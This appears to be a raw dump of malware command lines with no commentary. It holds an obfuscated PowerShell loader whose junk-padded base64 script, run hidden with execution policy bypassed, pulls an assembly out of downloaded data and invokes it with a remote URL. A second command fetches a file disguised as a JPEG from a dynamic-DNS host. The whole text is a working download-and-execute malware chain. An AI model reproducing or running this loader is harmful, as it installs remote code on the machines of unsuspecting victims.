⏬ ⦦ ⼀BJ㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀Hg㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀9㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀J㆛ ⺞ ⏬ ⦦ ⼀Bp㆛ ⺞ ⏬ ⦦ ⼀G0㆛ ⺞ ⏬ ⦦ ⼀YQBn㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀V㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀Hg㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀u㆛ ⺞ ⏬ ⦦ ⼀Ek㆛ ⺞ ⏬ ⦦ ⼀bgBk㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀e㆛ ⺞ ⏬ ⦦ ⼀BP㆛ ⺞ ⏬ ⦦ ⼀GY㆛ ⺞ ⏬ ⦦ ⼀K㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀HM㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bh㆛ ⺞ ⏬ ⦦ ⼀HI㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀BG㆛ ⺞ ⏬ ⦦ ⼀Gw㆛ ⺞ ⏬ ⦦ ⼀YQBn㆛ ⺞ ⏬ ⦦ ⼀Ck㆛ ⺞ ⏬ ⦦ ⼀Ow㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀ZQBu㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀SQBu㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀ZQB4㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀PQ㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀aQBt㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀ZwBl㆛ ⺞ ⏬ ⦦ ⼀FQ㆛ ⺞ ⏬ ⦦ ⼀ZQB4㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀LgBJ㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀Hg㆛ ⺞ ⏬ ⦦ ⼀TwBm㆛ ⺞ ⏬ ⦦ ⼀Cg㆛ ⺞ ⏬ ⦦ ⼀J㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀BG㆛ ⺞ ⏬ ⦦ ⼀Gw㆛ ⺞ ⏬ ⦦ ⼀YQBn㆛ ⺞ ⏬ ⦦ ⼀Ck㆛ ⺞ ⏬ ⦦ ⼀Ow㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀Gk㆛ ⺞ ⏬ ⦦ ⼀Zg㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀Cg㆛ ⺞ ⏬ ⦦ ⼀J㆛ ⺞ ⏬ ⦦ ⼀Bz㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀YQBy㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀SQBu㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀ZQB4㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀LQBn㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀w㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀LQBh㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀ZQBu㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀SQBu㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀ZQB4㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀LQBn㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀HM㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bh㆛ ⺞ ⏬ ⦦ ⼀HI㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀BJ㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀Hg㆛ ⺞ ⏬ ⦦ ⼀KQ㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀Hs㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀HM㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bh㆛ ⺞ ⏬ ⦦ ⼀HI㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀BJ㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀Hg㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀r㆛ ⺞ ⏬ ⦦ ⼀D0㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀HM㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bh㆛ ⺞ ⏬ ⦦ ⼀HI㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀BG㆛ ⺞ ⏬ ⦦ ⼀Gw㆛ ⺞ ⏬ ⦦ ⼀YQBn㆛ ⺞ ⏬ ⦦ ⼀C4㆛ ⺞ ⏬ ⦦ ⼀T㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀ZwB0㆛ ⺞ ⏬ ⦦ ⼀Gg㆛ ⺞ ⏬ ⦦ ⼀Ow㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀YgBh㆛ ⺞ ⏬ ⦦ ⼀HM㆛ ⺞ ⏬ ⦦ ⼀ZQ㆛ ⺞ ⏬ ⦦ ⼀2㆛ ⺞ ⏬ ⦦ ⼀DQ㆛ ⺞ ⏬ ⦦ ⼀T㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀ZwB0㆛ ⺞ ⏬ ⦦ ⼀Gg㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀9㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀J㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀BJ㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀Hg㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀t㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀J㆛ ⺞ ⏬ ⦦ ⼀Bz㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀YQBy㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀SQBu㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀ZQB4㆛ ⺞ ⏬ ⦦ ⼀Ds㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀GI㆛ ⺞ ⏬ ⦦ ⼀YQBz㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀Ng㆛ ⺞ ⏬ ⦦ ⼀0㆛ ⺞ ⏬ ⦦ ⼀EM㆛ ⺞ ⏬ ⦦ ⼀bwBt㆛ ⺞ ⏬ ⦦ ⼀G0㆛ ⺞ ⏬ ⦦ ⼀YQBu㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀9㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀J㆛ ⺞ ⏬ ⦦ ⼀Bp㆛ ⺞ ⏬ ⦦ ⼀G0㆛ ⺞ ⏬ ⦦ ⼀YQBn㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀V㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀Hg㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀u㆛ ⺞ ⏬ ⦦ ⼀FM㆛ ⺞ ⏬ ⦦ ⼀dQBi㆛ ⺞ ⏬ ⦦ ⼀HM㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀By㆛ ⺞ ⏬ ⦦ ⼀Gk㆛ ⺞ ⏬ ⦦ ⼀bgBn㆛ ⺞ ⏬ ⦦ ⼀Cg㆛ ⺞ ⏬ ⦦ ⼀J㆛ ⺞ ⏬ ⦦ ⼀Bz㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀YQBy㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀SQBu㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀ZQB4㆛ ⺞ ⏬ ⦦ ⼀Cw㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀GI㆛ ⺞ ⏬ ⦦ ⼀YQBz㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀Ng㆛ ⺞ ⏬ ⦦ ⼀0㆛ ⺞ ⏬ ⦦ ⼀Ew㆛ ⺞ ⏬ ⦦ ⼀ZQBu㆛ ⺞ ⏬ ⦦ ⼀Gc㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bo㆛ ⺞ ⏬ ⦦ ⼀Ck㆛ ⺞ ⏬ ⦦ ⼀Ow㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀YwBv㆛ ⺞ ⏬ ⦦ ⼀G0㆛ ⺞ ⏬ ⦦ ⼀bQBh㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀BC㆛ ⺞ ⏬ ⦦ ⼀Hk㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀HM㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀9㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀WwBT㆛ ⺞ ⏬ ⦦ ⼀Hk㆛ ⺞ ⏬ ⦦ ⼀cwB0㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀bQ㆛ ⺞ ⏬ ⦦ ⼀u㆛ ⺞ ⏬ ⦦ ⼀EM㆛ ⺞ ⏬ ⦦ ⼀bwBu㆛ ⺞ ⏬ ⦦ ⼀HY㆛ ⺞ ⏬ ⦦ ⼀ZQBy㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀XQ㆛ ⺞ ⏬ ⦦ ⼀6㆛ ⺞ ⏬ ⦦ ⼀Do㆛ ⺞ ⏬ ⦦ ⼀RgBy㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀bQBC㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀cwBl㆛ ⺞ ⏬ ⦦ ⼀DY㆛ ⺞ ⏬ ⦦ ⼀N㆛ ⺞ ⏬ ⦦ ⼀BT㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀cgBp㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Zw㆛ ⺞ ⏬ ⦦ ⼀o㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀YgBh㆛ ⺞ ⏬ ⦦ ⼀HM㆛ ⺞ ⏬ ⦦ ⼀ZQ㆛ ⺞ ⏬ ⦦ ⼀2㆛ ⺞ ⏬ ⦦ ⼀DQ㆛ ⺞ ⏬ ⦦ ⼀QwBv㆛ ⺞ ⏬ ⦦ ⼀G0㆛ ⺞ ⏬ ⦦ ⼀bQBh㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀p㆛ ⺞ ⏬ ⦦ ⼀Ds㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀Gw㆛ ⺞ ⏬ ⦦ ⼀bwBh㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀ZQBk㆛ ⺞ ⏬ ⦦ ⼀EE㆛ ⺞ ⏬ ⦦ ⼀cwBz㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀bQBi㆛ ⺞ ⏬ ⦦ ⼀Gw㆛ ⺞ ⏬ ⦦ ⼀eQ㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀D0㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀Bb㆛ ⺞ ⏬ ⦦ ⼀FM㆛ ⺞ ⏬ ⦦ ⼀eQBz㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀ZQBt㆛ ⺞ ⏬ ⦦ ⼀C4㆛ ⺞ ⏬ ⦦ ⼀UgBl㆛ ⺞ ⏬ ⦦ ⼀GY㆛ ⺞ ⏬ ⦦ ⼀b㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀GM㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bp㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀bg㆛ ⺞ ⏬ ⦦ ⼀u㆛ ⺞ ⏬ ⦦ ⼀EE㆛ ⺞ ⏬ ⦦ ⼀cwBz㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀bQBi㆛ ⺞ ⏬ ⦦ ⼀Gw㆛ ⺞ ⏬ ⦦ ⼀eQBd㆛ ⺞ ⏬ ⦦ ⼀Do㆛ ⺞ ⏬ ⦦ ⼀OgBM㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀YQBk㆛ ⺞ ⏬ ⦦ ⼀Cg㆛ ⺞ ⏬ ⦦ ⼀J㆛ ⺞ ⏬ ⦦ ⼀Bj㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀bQBt㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀bgBk㆛ ⺞ ⏬ ⦦ ⼀EI㆛ ⺞ ⏬ ⦦ ⼀eQB0㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀cw㆛ ⺞ ⏬ ⦦ ⼀p㆛ ⺞ ⏬ ⦦ ⼀Ds㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀eQBw㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀9㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀J㆛ ⺞ ⏬ ⦦ ⼀Bs㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀YQBk㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀BB㆛ ⺞ ⏬ ⦦ ⼀HM㆛ ⺞ ⏬ ⦦ ⼀cwBl㆛ ⺞ ⏬ ⦦ ⼀G0㆛ ⺞ ⏬ ⦦ ⼀YgBs㆛ ⺞ ⏬ ⦦ ⼀Hk㆛ ⺞ ⏬ ⦦ ⼀LgBH㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀BU㆛ ⺞ ⏬ ⦦ ⼀Hk㆛ ⺞ ⏬ ⦦ ⼀c㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀Cg㆛ ⺞ ⏬ ⦦ ⼀JwBk㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀b㆛ ⺞ ⏬ ⦦ ⼀Bp㆛ ⺞ ⏬ ⦦ ⼀GI㆛ ⺞ ⏬ ⦦ ⼀LgBJ㆛ ⺞ ⏬ ⦦ ⼀E8㆛ ⺞ ⏬ ⦦ ⼀LgBI㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀bQBl㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀KQ㆛ ⺞ ⏬ ⦦ ⼀7㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀J㆛ ⺞ ⏬ ⦦ ⼀Bt㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bo㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀D0㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀eQBw㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀LgBH㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀BN㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bo㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀o㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀VgBB㆛ ⺞ ⏬ ⦦ ⼀Ek㆛ ⺞ ⏬ ⦦ ⼀Jw㆛ ⺞ ⏬ ⦦ ⼀p㆛ ⺞ ⏬ ⦦ ⼀C4㆛ ⺞ ⏬ ⦦ ⼀SQBu㆛ ⺞ ⏬ ⦦ ⼀HY㆛ ⺞ ⏬ ⦦ ⼀bwBr㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀K㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀dQBs㆛ ⺞ ⏬ ⦦ ⼀Gw㆛ ⺞ ⏬ ⦦ ⼀L㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀Fs㆛ ⺞ ⏬ ⦦ ⼀bwBi㆛ ⺞ ⏬ ⦦ ⼀Go㆛ ⺞ ⏬ ⦦ ⼀ZQBj㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀WwBd㆛ ⺞ ⏬ ⦦ ⼀F0㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀o㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀B4㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀LgBN㆛ ⺞ ⏬ ⦦ ⼀Es㆛ ⺞ ⏬ ⦦ ⼀TgBT㆛ ⺞ ⏬ ⦦ ⼀C8㆛ ⺞ ⏬ ⦦ ⼀M㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀y㆛ ⺞ ⏬ ⦦ ⼀C8㆛ ⺞ ⏬ ⦦ ⼀Nw㆛ ⺞ ⏬ ⦦ ⼀0㆛ ⺞ ⏬ ⦦ ⼀DE㆛ ⺞ ⏬ ⦦ ⼀Lg㆛ ⺞ ⏬ ⦦ ⼀5㆛ ⺞ ⏬ ⦦ ⼀D㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀MQ㆛ ⺞ ⏬ ⦦ ⼀u㆛ ⺞ ⏬ ⦦ ⼀DM㆛ ⺞ ⏬ ⦦ ⼀Lg㆛ ⺞ ⏬ ⦦ ⼀y㆛ ⺞ ⏬ ⦦ ⼀Dk㆛ ⺞ ⏬ ⦦ ⼀MQ㆛ ⺞ ⏬ ⦦ ⼀v㆛ ⺞ ⏬ ⦦ ⼀C8㆛ ⺞ ⏬ ⦦ ⼀OgBw㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bo㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀s㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀JwBk㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀cwBh㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀aQB2㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀s㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀JwBk㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀cwBh㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀aQB2㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀s㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀JwBk㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀cwBh㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀aQB2㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀L㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀n㆛ ⺞ ⏬ ⦦ ⼀FI㆛ ⺞ ⏬ ⦦ ⼀ZQBn㆛ ⺞ ⏬ ⦦ ⼀EE㆛ ⺞ ⏬ ⦦ ⼀cwBt㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀L㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀n㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀ZQBz㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bp㆛ ⺞ ⏬ ⦦ ⼀HY㆛ ⺞ ⏬ ⦦ ⼀YQBk㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀Jw㆛ ⺞ ⏬ ⦦ ⼀p㆛ ⺞ ⏬ ⦦ ⼀Ck㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀B9㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀fQ㆛ ⺞ ⏬ ⦦ ⼀=';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('㆛ ⺞ ⏬ ⦦ ⼀','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$link = 'http://servidorwindows.ddns.com.br/Files/vbs.jpeg'; $webClient = New-Object System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) } catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; exit }; if ($downloadedData -ne $null) 